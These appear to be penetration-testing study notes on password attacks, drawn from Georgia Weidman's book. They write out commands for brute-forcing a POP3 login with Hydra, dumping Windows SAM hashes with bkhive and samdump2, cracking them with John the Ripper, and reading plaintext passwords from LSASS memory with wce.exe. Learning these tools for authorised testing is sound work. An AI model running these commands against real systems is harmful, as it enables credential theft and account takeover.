Source: Georgia Weidman on "Advanced Penetration Test"

(1) Crunch
Tool to brute-force a keyspace
$: crunch 7 7 AB
Enumerates all 7-character passwords composed of only the characters A and B

(2) CeWL
Tool to map a website and pull potentially interesting words to add to a wordlist
$: cewl -w [words].txt -d 1 -m 5 www.[website].com
-d 1: depth 1
-m 5: minimum length of word is 5 characters

(3) Hydra
Online password cracking tool
$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks

(1) Opening the SAM File
We got access to a backup of the SAM and SYSTEM files with the directory traversal vulnerability. You can also get access to these files with physical access unless they have a BIOS password in place.
$: bkhive system xpkey.txt
$: samdump2 sam xpkey.txt

(2) John the Ripper
$: john xphashes.txt johnlinuxpasswords.txt --wordlist=passwordfile.txt

(3) oclHashcat
Can use GPUs to crack faster

Online Password Cracking
http://tools.question-defense.com
http://cloudcracker.com

Windows Credential Editor
Tool to pull plaintext passwords etc. out of the memory of the LSASS process
*Have to drop the binary onto the system
wce.exe -w
Author: Vitali Kremez